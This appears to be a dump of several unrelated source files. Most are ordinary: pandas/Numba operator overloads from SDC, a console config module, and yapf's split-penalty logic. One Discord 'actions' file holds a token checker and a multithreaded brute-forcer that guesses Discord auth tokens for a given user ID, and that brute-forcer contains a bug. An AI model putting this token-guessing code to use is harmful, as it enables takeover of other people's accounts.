ret_typ = string_methods_type(data)
sig = signature(ret_typ, data)
"""
Construct signature of the Numba SeriesGroupByType::ctor()
"""
return sig, _hpat_pandas_stringmethods_init_codegen
return _hpat_pandas_stringmethods_init
_hpat_pandas_stringmethods_init = intrinsic(
_gen_hpat_pandas_stringmethods_init(string_methods_type=StringMethodsType))
_hpat_pandas_split_view_stringmethods_init = intrinsic(
_gen_hpat_pandas_stringmethods_init(string_methods_type=SplitViewStringMethodsType))
@sdc_overload(pandas.core.strings.StringMethods)
def hpat_pandas_stringmethods(obj):
"""
Special Numba procedure to overload Python type pandas.core.strings.StringMethods::ctor()
with Numba registered model
"""
if isinstance(obj.data, StringArraySplitViewType):
def hpat_pandas_split_view_stringmethods_impl(obj):
return _hpat_pandas_split_view_stringmethods_init(obj)
return hpat_pandas_split_view_stringmethods_impl
def hpat_pandas_stringmethods_impl(obj):
return _hpat_pandas_stringmethods_init(obj)
return hpat_pandas_stringmethods_impl
```
#### File: sdc/sdc/sdc_function_templates.py
```python
import numba
import numpy
import operator
import pandas
from numba.errors import TypingError
from numba import types
from sdc.utilities.sdc_typing_utils import (TypeChecker, check_index_is_numeric, check_types_comparable,
find_common_dtype_from_numpy_dtypes)
from sdc.datatypes.common_functions import (sdc_join_series_indexes, sdc_check_indexes_equal)
from sdc.hiframes.pd_series_type import SeriesType
from sdc.str_arr_ext import (string_array_type, str_arr_is_na)
from sdc.utilities.utils import sdc_overload
from sdc.functions.numpy_like import astype
def sdc_pandas_series_operator_binop(self, other):
"""
Pandas Series operator :attr:`pandas.Series.binop` implementation
Note: Currently implemented for numeric Series only.
Differs from Pandas in returning Series with fixed dtype :obj:`float64`
.. only:: developer
**Test**: python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op1*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op2*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_operator_binop*
Parameters
----------
series: :obj:`pandas.Series`
Input series
other: :obj:`pandas.Series` or :obj:`scalar`
Series or scalar value to be used as a second argument of binary operation
Returns
-------
:obj:`pandas.Series`
The result of the operation
"""
_func_name = 'Operator binop().'
ty_checker = TypeChecker('Operator binop().')
self_is_series, other_is_series = isinstance(self, SeriesType), isinstance(other, SeriesType)
if not (self_is_series or other_is_series):
return None
# this overload is not for string series
self_is_string_series = self_is_series and isinstance(self.dtype, types.UnicodeType)
other_is_string_series = other_is_series and isinstance(other.dtype, types.UnicodeType)
if self_is_string_series or other_is_string_series:
return None
if not isinstance(self, (SeriesType, types.Number)):
ty_checker.raise_exc(self, 'pandas.series or scalar', 'self')
if not isinstance(other, (SeriesType, types.Number)):
ty_checker.raise_exc(other, 'pandas.series or scalar', 'other')
operands_are_series = self_is_series and other_is_series
if operands_are_series:
none_or_numeric_indexes = ((isinstance(self.index, types.NoneType) or check_index_is_numeric(self))
and (isinstance(other.index, types.NoneType) or check_index_is_numeric(other)))
series_indexes_comparable = check_types_comparable(self.index, other.index) or none_or_numeric_indexes
if not series_indexes_comparable:
raise TypingError('{} Not implemented for series with not-comparable indexes. \
Given: self.index={}, other.index={}'.format(_func_name, self.index, other.index))
series_data_comparable = check_types_comparable(self, other)
if not series_data_comparable:
raise TypingError('{} Not supported for not-comparable operands. \
Given: self={}, other={}'.format(_func_name, self, other))
# specializations for numeric series only
if not operands_are_series:
def _series_operator_binop_scalar_impl(self, other):
if self_is_series == True: # noqa
result_data = numpy.empty(len(self._data), dtype=numpy.float64)
result_data[:] = self._data + numpy.float64(other)
return pandas.Series(result_data, index=self._index, name=self._name)
else:
result_data = numpy.empty(len(other._data), dtype=numpy.float64)
result_data[:] = numpy.float64(self) + other._data
return pandas.Series(result_data, index=other._index, name=other._name)
return _series_operator_binop_scalar_impl
else: # both operands are numeric series
# optimization for series with default indexes, that can be aligned differently
if (isinstance(self.index, types.NoneType) and isinstance(other.index, types.NoneType)):
def _series_operator_binop_none_indexes_impl(self, other):
if (len(self._data) == len(other._data)):
result_data = astype(self._data, numpy.float64)
result_data = result_data + other._data
return pandas.Series(result_data)
else:
left_size, right_size = len(self._data), len(other._data)
min_data_size = min(left_size, right_size)
max_data_size = max(left_size, right_size)
result_data = numpy.empty(max_data_size, dtype=numpy.float64)
if (left_size == min_data_size):
result_data[:min_data_size] = self._data
result_data[min_data_size:] = numpy.nan
result_data = result_data + other._data
else:
result_data[:min_data_size] = other._data
result_data[min_data_size:] = numpy.nan
result_data = self._data + result_data
return pandas.Series(result_data)
return _series_operator_binop_none_indexes_impl
else:
# for numeric indexes find common dtype to be used when creating joined index
if none_or_numeric_indexes:
ty_left_index_dtype = types.int64 if isinstance(self.index, types.NoneType) else self.index.dtype
ty_right_index_dtype = types.int64 if isinstance(other.index, types.NoneType) else other.index.dtype
numba_index_common_dtype = find_common_dtype_from_numpy_dtypes(
[ty_left_index_dtype, ty_right_index_dtype], [])
def _series_operator_binop_common_impl(self, other):
left_index, right_index = self.index, other.index
# check if indexes are equal and series don't have to be aligned
if sdc_check_indexes_equal(left_index, right_index):
result_data = numpy.empty(len(self._data), dtype=numpy.float64)
result_data[:] = self._data + other._data
if none_or_numeric_indexes == True: # noqa
result_index = astype(left_index, numba_index_common_dtype)
else:
result_index = self._index
return pandas.Series(result_data, index=result_index)
# TODO: replace below with core join(how='outer', return_indexers=True) when implemented
joined_index, left_indexer, right_indexer = sdc_join_series_indexes(left_index, right_index)
result_size = len(joined_index)
left_values = numpy.empty(result_size, dtype=numpy.float64)
right_values = numpy.empty(result_size, dtype=numpy.float64)
for i in numba.prange(result_size):
left_pos, right_pos = left_indexer[i], right_indexer[i]
left_values[i] = self._data[left_pos] if left_pos != -1 else numpy.nan
right_values[i] = other._data[right_pos] if right_pos != -1 else numpy.nan
result_data = left_values + right_values
return pandas.Series(result_data, joined_index)
return _series_operator_binop_common_impl
return None
def sdc_pandas_series_operator_comp_binop(self, other):
"""
Pandas Series operator :attr:`pandas.Series.comp_binop` implementation
.. only:: developer
**Test**: python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op7*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_operator_comp_binop*
Parameters
----------
series: :obj:`pandas.Series`
Input series
other: :obj:`pandas.Series` or :obj:`scalar`
Series or scalar value to be used as a second argument of binary operation
Returns
-------
:obj:`pandas.Series`
The result of the operation
"""
_func_name = 'Operator comp_binop().'
ty_checker = TypeChecker('Operator comp_binop().')
self_is_series, other_is_series = isinstance(self, SeriesType), isinstance(other, SeriesType)
if not (self_is_series or other_is_series):
return None
if not isinstance(self, (SeriesType, types.Number, types.UnicodeType)):
ty_checker.raise_exc(self, 'pandas.series or scalar', 'self')
if not isinstance(other, (SeriesType, types.Number, types.UnicodeType)):
ty_checker.raise_exc(other, 'pandas.series or scalar', 'other')
operands_are_series = self_is_series and other_is_series
if operands_are_series:
none_or_numeric_indexes = ((isinstance(self.index, types.NoneType) or check_index_is_numeric(self))
and (isinstance(other.index, types.NoneType) or check_index_is_numeric(other)))
series_indexes_comparable = check_types_comparable(self.index, other.index) or none_or_numeric_indexes
if not series_indexes_comparable:
raise TypingError('{} Not implemented for series with not-comparable indexes. \
Given: self.index={}, other.index={}'.format(_func_name, self.index, other.index))
series_data_comparable = check_types_comparable(self, other)
if not series_data_comparable:
raise TypingError('{} Not supported for not-comparable operands. \
Given: self={}, other={}'.format(_func_name, self, other))
if not operands_are_series:
def _series_operator_comp_binop_scalar_impl(self, other):
if self_is_series == True: # noqa
return pandas.Series(self._data < other, index=self._index, name=self._name)
else:
return pandas.Series(self < other._data, index=other._index, name=other._name)
return _series_operator_comp_binop_scalar_impl
else:
# optimization for series with default indexes, that can be aligned differently
if (isinstance(self.index, types.NoneType) and isinstance(other.index, types.NoneType)):
def _series_operator_comp_binop_none_indexes_impl(self, other):
left_size, right_size = len(self._data), len(other._data)
if (left_size == right_size):
return pandas.Series(self._data < other._data)
else:
raise ValueError("Can only compare identically-labeled Series objects")
return _series_operator_comp_binop_none_indexes_impl
else:
if none_or_numeric_indexes:
ty_left_index_dtype = types.int64 if isinstance(self.index, types.NoneType) else self.index.dtype
ty_right_index_dtype = types.int64 if isinstance(other.index, types.NoneType) else other.index.dtype
numba_index_common_dtype = find_common_dtype_from_numpy_dtypes(
[ty_left_index_dtype, ty_right_index_dtype], [])
def _series_operator_comp_binop_common_impl(self, other):
left_index, right_index = self.index, other.index
if sdc_check_indexes_equal(left_index, right_index):
if none_or_numeric_indexes == True: # noqa
new_index = astype(left_index, numba_index_common_dtype)
else:
new_index = self._index
return pandas.Series(self._data < other._data,
new_index)
else:
raise ValueError("Can only compare identically-labeled Series objects")
return _series_operator_comp_binop_common_impl
return None
def sdc_str_arr_operator_comp_binop(self, other):
self_is_str_arr = self == string_array_type
other_is_str_arr = other == string_array_type
operands_are_arrays = self_is_str_arr and other_is_str_arr
if not (operands_are_arrays
or (self_is_str_arr and isinstance(other, types.UnicodeType))
or (isinstance(self, types.UnicodeType) and other_is_str_arr)):
return None
if operands_are_arrays:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
if len(self) != len(other):
raise ValueError("Mismatch of String Arrays sizes in operator.comp_binop")
n = len(self)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self[i] < other[i]
and not (str_arr_is_na(self, i) or str_arr_is_na(other, i)))
return out_list
elif self_is_str_arr:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
n = len(self)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self[i] < other and not (str_arr_is_na(self, i)))
return out_list
elif other_is_str_arr:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
n = len(other)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self < other[i] and not (str_arr_is_na(other, i)))
return out_list
else:
return None
return _sdc_str_arr_operator_comp_binop_impl
``` |
{
"source": "1ExtremeDev/Account-Checker",
"score": 3
} |
#### File: Account-Checker/core/config.py
```python
from os import stat
import random
from pyfiglet import Figlet
import shutil
config = {
"title": "Regrix",
"author": "ExtremeDev",
"version": "alpha"
}
messages = [
"message1",
"message2",
"message3",
"message4"
]
class Information:
@staticmethod
def print_half(text):
if str(type(text)).__contains__('pyfiglet.FigletString'):
columns = shutil.get_terminal_size().columns
for each in str(text).split('\n'):
print(each.center(columns))
else:
columns = shutil.get_terminal_size().columns
print(text.center(columns))
@staticmethod
def title():
return Figlet(font='standard').renderText(config['title'])
@staticmethod
def author():
return config['author']
@staticmethod
def version():
return str(config['version'])
@staticmethod
def information():
return str(random.choice(messages))
``` |
{
"source": "1ExtremeDev/ExtremeSx",
"score": 3
} |
#### File: core/discord/actions.py
```python
from core.lib.Proxy.proxy import Proxy
class Join:
"""
This class joins a discord group (link must be only the code)
"""
def __init__(self,
token: str,
link: str,
proxy: list = None
) -> None:
self.proxy = proxy if proxy is not None else None
self.link = link if len(link) == 8 else None
self.token = token
self.join()
def join(self):
try:
import requests
requestResponse = requests.post(
"https://discordapp.com/api/v6/invite/{}".format(self.link),
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'unknown'
elif 'expires_at' in requestResponse.text:
self.r = 'join'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
class Leave:
"""
This class leave a discord group (link must be only the code)
"""
def __init__(self,
token: str,
link: str,
proxy: list = None
) -> None:
self.proxy = proxy if proxy is not None else None
self.link = link if len(link) == 8 else None
self.token = token
self.leave()
def leave(self):
try:
import requests
requestResponse = requests.post(
"https://discordapp.com/api/v7/users/@me/guilds/{}".format(self.link),
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'unknown'
elif requestResponse.status_code == 204:
self.r = 'join'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
class Checker:
"""
This class checks a discord token
"""
def __init__(self,
token: str,
proxy: list = None
) -> None:
self.proxy = proxy if proxy is not None else None
self.token = token
self.check()
def check(self):
try:
import requests
requestResponse = requests.post(
"https://discordapp.com/api/v6/invite/pXdxXCC",
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unauthorized' in requestResponse.text:
self.r = 'invalid'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'valid'
elif 'Access denied' in requestResponse.text:
self.r = 'denied'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
class BruteForce:
def __init__(self,
identifier: str,
proxy: list = None
) -> None:
self.id = identifier
self.proxy = proxy if proxy is not None else None
self.start()
def start(self):
import base64, random
import string, requests
import threading
tokens = {"list": [], "valid": None}
def check(token):
try:
requestResponse = requests.get(
"https://discordapp.com/api/v9/auth/login",
headers = {
'Authorization': token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if requestResponse.status_code == 200:
print(" [-] %s " % ( token, ))
token["valid"] = token
else:
print(" [-] %s " % ( token, ))
tokens["list"].append(token)
except:
threading.Thread(target=check, args=(token,)).start()
self.id = str(base64.b64encode((self.id).encode("ascii")))[2:-1]
while True:
token = self.id + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=4)) + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=25))
if threading.active_count() < 250 and tokens["valid"] is None:
threading.Thread(target=check, args=(token,)).start()
```
#### File: core/screen/syst.py
```python
class System:
def Clear():
from platform import platform; from os import system
system('cls') if platform().startswith('Windows') else system('clear')
``` |
{
"source": "1exx/yapf",
"score": 2
} |
#### File: yapf/yapflib/split_penalty.py
```python
import re
from lib2to3 import pytree
from yapf.yapflib import format_token
from yapf.yapflib import py3compat
from yapf.yapflib import pytree_utils
from yapf.yapflib import pytree_visitor
from yapf.yapflib import style
# TODO(morbo): Document the annotations in a centralized place. E.g., the
# README file.
UNBREAKABLE = 1000 * 1000
NAMED_ASSIGN = 15000
DOTTED_NAME = 4000
VERY_STRONGLY_CONNECTED = 3500
STRONGLY_CONNECTED = 3000
CONNECTED = 500
TOGETHER = 100
OR_TEST = 1000
AND_TEST = 1100
NOT_TEST = 1200
COMPARISON = 1300
STAR_EXPR = 1300
EXPR = 1400
XOR_EXPR = 1500
AND_EXPR = 1700
SHIFT_EXPR = 1800
ARITH_EXPR = 1900
TERM = 2000
FACTOR = 2100
POWER = 2200
ATOM = 2300
ONE_ELEMENT_ARGUMENT = 500
SUBSCRIPT = 6000
def ComputeSplitPenalties(tree):
"""Compute split penalties on tokens in the given parse tree.
Arguments:
tree: the top-level pytree node to annotate with penalties.
"""
_SplitPenaltyAssigner().Visit(tree)
class _SplitPenaltyAssigner(pytree_visitor.PyTreeVisitor):
"""Assigns split penalties to tokens, based on parse tree structure.
Split penalties are attached as annotations to tokens.
"""
def Visit(self, node):
if not hasattr(node, 'is_pseudo'): # Ignore pseudo tokens.
super(_SplitPenaltyAssigner, self).Visit(node)
def Visit_import_as_names(self, node): # pyline: disable=invalid-name
# import_as_names ::= import_as_name (',' import_as_name)* [',']
self.DefaultNodeVisit(node)
prev_child = None
for child in node.children:
if (prev_child and isinstance(prev_child, pytree.Leaf) and
prev_child.value == ','):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_IMPORT_NAMES'))
prev_child = child
def Visit_classdef(self, node): # pylint: disable=invalid-name
# classdef ::= 'class' NAME ['(' [arglist] ')'] ':' suite
#
# NAME
_SetUnbreakable(node.children[1])
if len(node.children) > 4:
# opening '('
_SetUnbreakable(node.children[2])
# ':'
_SetUnbreakable(node.children[-2])
self.DefaultNodeVisit(node)
def Visit_funcdef(self, node): # pylint: disable=invalid-name
# funcdef ::= 'def' NAME parameters ['->' test] ':' suite
#
# Can't break before the function name and before the colon. The parameters
# are handled by child iteration.
colon_idx = 1
while pytree_utils.NodeName(node.children[colon_idx]) == 'simple_stmt':
colon_idx += 1
_SetUnbreakable(node.children[colon_idx])
arrow_idx = -1
while colon_idx < len(node.children):
if isinstance(node.children[colon_idx], pytree.Leaf):
if node.children[colon_idx].value == ':':
break
if node.children[colon_idx].value == '->':
arrow_idx = colon_idx
colon_idx += 1
_SetUnbreakable(node.children[colon_idx])
self.DefaultNodeVisit(node)
if arrow_idx > 0:
_SetSplitPenalty(
pytree_utils.LastLeafNode(node.children[arrow_idx - 1]), 0)
_SetUnbreakable(node.children[arrow_idx])
_SetStronglyConnected(node.children[arrow_idx + 1])
def Visit_lambdef(self, node): # pylint: disable=invalid-name
# lambdef ::= 'lambda' [varargslist] ':' test
# Loop over the lambda up to and including the colon.
allow_multiline_lambdas = style.Get('ALLOW_MULTILINE_LAMBDAS')
if not allow_multiline_lambdas:
for child in node.children:
if pytree_utils.NodeName(child) == 'COMMENT':
if re.search(r'pylint:.*disable=.*\bg-long-lambda', child.value):
allow_multiline_lambdas = True
break
if allow_multiline_lambdas:
_SetExpressionPenalty(node, STRONGLY_CONNECTED)
else:
_SetExpressionPenalty(node, VERY_STRONGLY_CONNECTED)
def Visit_parameters(self, node): # pylint: disable=invalid-name
# parameters ::= '(' [typedargslist] ')'
self.DefaultNodeVisit(node)
# Can't break before the opening paren of a parameter list.
_SetUnbreakable(node.children[0])
if not (style.Get('INDENT_CLOSING_BRACKETS') or
style.Get('DEDENT_CLOSING_BRACKETS')):
_SetStronglyConnected(node.children[-1])
def Visit_arglist(self, node): # pylint: disable=invalid-name
# arglist ::= argument (',' argument)* [',']
if pytree_utils.NodeName(node.children[0]) == 'STAR':
# Python 3 treats a star expression as a specific expression type.
# Process it in that method.
self.Visit_star_expr(node)
return
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children)):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == ',':
_SetUnbreakable(child)
for child in node.children:
if pytree_utils.NodeName(child) == 'atom':
_IncreasePenalty(child, CONNECTED)
def Visit_argument(self, node): # pylint: disable=invalid-name
# argument ::= test [comp_for] | test '=' test # Really [keyword '='] test
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == '=':
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), NAMED_ASSIGN)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), NAMED_ASSIGN)
def Visit_tname(self, node): # pylint: disable=invalid-name
# tname ::= NAME [':' test]
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == ':':
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), NAMED_ASSIGN)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), NAMED_ASSIGN)
def Visit_dotted_name(self, node): # pylint: disable=invalid-name
# dotted_name ::= NAME ('.' NAME)*
for child in node.children:
self.Visit(child)
start = 2 if hasattr(node.children[0], 'is_pseudo') else 1
for i in py3compat.range(start, len(node.children)):
_SetUnbreakable(node.children[i])
def Visit_dictsetmaker(self, node): # pylint: disable=invalid-name
# dictsetmaker ::= ( (test ':' test
# (comp_for | (',' test ':' test)* [','])) |
# (test (comp_for | (',' test)* [','])) )
for child in node.children:
self.Visit(child)
if pytree_utils.NodeName(child) == 'COLON':
# This is a key to a dictionary. We don't want to split the key if at
# all possible.
_SetStronglyConnected(child)
def Visit_trailer(self, node): # pylint: disable=invalid-name
# trailer ::= '(' [arglist] ')' | '[' subscriptlist ']' | '.' NAME
if node.children[0].value == '.':
before = style.Get('SPLIT_BEFORE_DOT')
_SetSplitPenalty(node.children[0],
VERY_STRONGLY_CONNECTED if before else DOTTED_NAME)
_SetSplitPenalty(node.children[1],
DOTTED_NAME if before else VERY_STRONGLY_CONNECTED)
elif len(node.children) == 2:
# Don't split an empty argument list if at all possible.
_SetSplitPenalty(node.children[1], VERY_STRONGLY_CONNECTED)
elif len(node.children) == 3:
name = pytree_utils.NodeName(node.children[1])
if name in {'argument', 'comparison'}:
# Don't split an argument list with one element if at all possible.
_SetStronglyConnected(node.children[1])
if (len(node.children[1].children) > 1 and
pytree_utils.NodeName(node.children[1].children[1]) == 'comp_for'):
# Don't penalize splitting before a comp_for expression.
_SetSplitPenalty(pytree_utils.FirstLeafNode(node.children[1]), 0)
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[1]),
ONE_ELEMENT_ARGUMENT)
elif (pytree_utils.NodeName(node.children[0]) == 'LSQB' and
len(node.children[1].children) > 2 and
(name.endswith('_test') or name.endswith('_expr'))):
_SetStronglyConnected(node.children[1].children[0])
_SetStronglyConnected(node.children[1].children[2])
# Still allow splitting around the operator.
split_before = ((name.endswith('_test') and
style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR')) or
(name.endswith('_expr') and
style.Get('SPLIT_BEFORE_BITWISE_OPERATOR')))
if split_before:
_SetSplitPenalty(
pytree_utils.LastLeafNode(node.children[1].children[1]), 0)
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[1].children[2]), 0)
# Don't split the ending bracket of a subscript list.
_RecAnnotate(node.children[-1], pytree_utils.Annotation.SPLIT_PENALTY,
VERY_STRONGLY_CONNECTED)
elif name not in {
'arglist', 'argument', 'term', 'or_test', 'and_test', 'comparison',
'atom', 'power'
}:
# Don't split an argument list with one element if at all possible.
subtypes = pytree_utils.GetNodeAnnotation(
pytree_utils.FirstLeafNode(node), pytree_utils.Annotation.SUBTYPE)
if subtypes and format_token.Subtype.SUBSCRIPT_BRACKET in subtypes:
_IncreasePenalty(node, SUBSCRIPT)
# Bump up the split penalty for the first part of a subscript. We
# would rather not split there.
_IncreasePenalty(node.children[1], CONNECTED)
else:
_SetStronglyConnected(node.children[1], node.children[2])
if name == 'arglist':
_SetStronglyConnected(node.children[-1])
self.DefaultNodeVisit(node)
def Visit_power(self, node): # pylint: disable=invalid-name,missing-docstring
# power ::= atom trailer* ['**' factor]
self.DefaultNodeVisit(node)
# When atom is followed by a trailer, we can not break between them.
# E.g. arr[idx] - no break allowed between 'arr' and '['.
if (len(node.children) > 1 and
pytree_utils.NodeName(node.children[1]) == 'trailer'):
# children[1] itself is a whole trailer: we don't want to
# mark all of it as unbreakable, only its first token: (, [ or .
first = pytree_utils.FirstLeafNode(node.children[1])
if first.value != '.':
_SetUnbreakable(node.children[1].children[0])
# A special case when there are more trailers in the sequence. Given:
# atom tr1 tr2
# The last token of tr1 and the first token of tr2 comprise an unbreakable
# region. For example: foo.bar.baz(1)
# We can't put breaks between either of the '.', '(', or '[' and the names
# *preceding* them.
prev_trailer_idx = 1
while prev_trailer_idx < len(node.children) - 1:
cur_trailer_idx = prev_trailer_idx + 1
cur_trailer = node.children[cur_trailer_idx]
if pytree_utils.NodeName(cur_trailer) != 'trailer':
break
# Now we know we have two trailers one after the other
prev_trailer = node.children[prev_trailer_idx]
if prev_trailer.children[-1].value != ')':
# Set the previous node unbreakable if it's not a function call:
# atom tr1() tr2
# It may be necessary (though undesirable) to split up a previous
# function call's parentheses to the next line.
_SetStronglyConnected(prev_trailer.children[-1])
_SetStronglyConnected(cur_trailer.children[0])
prev_trailer_idx = cur_trailer_idx
# We don't want to split before the last ')' of a function call. This also
# takes care of the special case of:
# atom tr1 tr2 ... trn
# where the 'tr#' are trailers that may end in a ')'.
for trailer in node.children[1:]:
if pytree_utils.NodeName(trailer) != 'trailer':
break
if trailer.children[0].value in '([':
if len(trailer.children) > 2:
subtypes = pytree_utils.GetNodeAnnotation(
trailer.children[0], pytree_utils.Annotation.SUBTYPE)
if subtypes and format_token.Subtype.SUBSCRIPT_BRACKET in subtypes:
_SetStronglyConnected(
pytree_utils.FirstLeafNode(trailer.children[1]))
last_child_node = pytree_utils.LastLeafNode(trailer)
if last_child_node.value.strip().startswith('#'):
last_child_node = last_child_node.prev_sibling
if not (style.Get('INDENT_CLOSING_BRACKETS') or
style.Get('DEDENT_CLOSING_BRACKETS')):
last = pytree_utils.LastLeafNode(last_child_node.prev_sibling)
if last.value != ',':
if last_child_node.value == ']':
_SetUnbreakable(last_child_node)
else:
_SetSplitPenalty(last_child_node, VERY_STRONGLY_CONNECTED)
else:
# If the trailer's children are '()', then make it a strongly
# connected region. It's sometimes necessary, though undesirable, to
# split the two.
_SetStronglyConnected(trailer.children[-1])
def Visit_subscriptlist(self, node): # pylint: disable=invalid-name
# subscriptlist ::= subscript (',' subscript)* [',']
self.DefaultNodeVisit(node)
_SetSplitPenalty(pytree_utils.FirstLeafNode(node), 0)
prev_child = None
for child in node.children:
if prev_child and pytree_utils.NodeName(prev_child) == 'COMMA':
_SetSplitPenalty(pytree_utils.FirstLeafNode(child), 0)
prev_child = child
def Visit_subscript(self, node): # pylint: disable=invalid-name
# subscript ::= test | [test] ':' [test] [sliceop]
_SetStronglyConnected(*node.children)
self.DefaultNodeVisit(node)
def Visit_comp_for(self, node): # pylint: disable=invalid-name
# comp_for ::= 'for' exprlist 'in' testlist_safe [comp_iter]
_SetSplitPenalty(pytree_utils.FirstLeafNode(node), 0)
_SetStronglyConnected(*node.children[1:])
self.DefaultNodeVisit(node)
def Visit_old_comp_for(self, node): # pylint: disable=invalid-name
# Python 3.7
self.Visit_comp_for(node)
def Visit_comp_if(self, node): # pylint: disable=invalid-name
# comp_if ::= 'if' old_test [comp_iter]
_SetSplitPenalty(node.children[0],
style.Get('SPLIT_PENALTY_BEFORE_IF_EXPR'))
_SetStronglyConnected(*node.children[1:])
self.DefaultNodeVisit(node)
def Visit_old_comp_if(self, node): # pylint: disable=invalid-name
# Python 3.7
self.Visit_comp_if(node)
def Visit_test(self, node): # pylint: disable=invalid-name
# test ::= or_test ['if' or_test 'else' test] | lambdef
_IncreasePenalty(node, OR_TEST)
self.DefaultNodeVisit(node)
def Visit_or_test(self, node): # pylint: disable=invalid-name
# or_test ::= and_test ('or' and_test)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, OR_TEST)
index = 1
while index + 1 < len(node.children):
if style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR'):
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), OR_TEST)
else:
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), OR_TEST)
index += 2
def Visit_and_test(self, node): # pylint: disable=invalid-name
# and_test ::= not_test ('and' not_test)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, AND_TEST)
index = 1
while index + 1 < len(node.children):
if style.Get('SPLIT_BEFORE_LOGICAL_OPERATOR'):
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), AND_TEST)
else:
_DecrementSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), AND_TEST)
index += 2
def Visit_not_test(self, node): # pylint: disable=invalid-name
# not_test ::= 'not' not_test | comparison
self.DefaultNodeVisit(node)
_IncreasePenalty(node, NOT_TEST)
def Visit_comparison(self, node): # pylint: disable=invalid-name
# comparison ::= expr (comp_op expr)*
self.DefaultNodeVisit(node)
if len(node.children) == 3 and _StronglyConnectedCompOp(node):
_IncreasePenalty(node.children[1], VERY_STRONGLY_CONNECTED)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[2]), STRONGLY_CONNECTED)
else:
_IncreasePenalty(node, COMPARISON)
def Visit_star_expr(self, node): # pylint: disable=invalid-name
# star_expr ::= '*' expr
self.DefaultNodeVisit(node)
_IncreasePenalty(node, STAR_EXPR)
def Visit_expr(self, node): # pylint: disable=invalid-name
# expr ::= xor_expr ('|' xor_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, EXPR)
_SetBitwiseOperandPenalty(node, '|')
def Visit_xor_expr(self, node): # pylint: disable=invalid-name
# xor_expr ::= and_expr ('^' and_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, XOR_EXPR)
_SetBitwiseOperandPenalty(node, '^')
def Visit_and_expr(self, node): # pylint: disable=invalid-name
# and_expr ::= shift_expr ('&' shift_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, AND_EXPR)
_SetBitwiseOperandPenalty(node, '&')
def Visit_shift_expr(self, node): # pylint: disable=invalid-name
# shift_expr ::= arith_expr (('<<'|'>>') arith_expr)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, SHIFT_EXPR)
_ARITH_OPS = frozenset({'PLUS', 'MINUS'})
def Visit_arith_expr(self, node): # pylint: disable=invalid-name
# arith_expr ::= term (('+'|'-') term)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, ARITH_EXPR)
_SetExpressionOperandPenalty(node, self._ARITH_OPS)
_TERM_OPS = frozenset({'STAR', 'AT', 'SLASH', 'PERCENT', 'DOUBLESLASH'})
def Visit_term(self, node): # pylint: disable=invalid-name
# term ::= factor (('*'|'@'|'/'|'%'|'//') factor)*
self.DefaultNodeVisit(node)
_IncreasePenalty(node, TERM)
_SetExpressionOperandPenalty(node, self._TERM_OPS)
def Visit_factor(self, node): # pyline: disable=invalid-name
# factor ::= ('+'|'-'|'~') factor | power
self.DefaultNodeVisit(node)
_IncreasePenalty(node, FACTOR)
def Visit_atom(self, node): # pylint: disable=invalid-name
# atom ::= ('(' [yield_expr|testlist_gexp] ')'
# '[' [listmaker] ']' |
# '{' [dictsetmaker] '}')
self.DefaultNodeVisit(node)
if (node.children[0].value == '(' and
not hasattr(node.children[0], 'is_pseudo')):
if node.children[-1].value == ')':
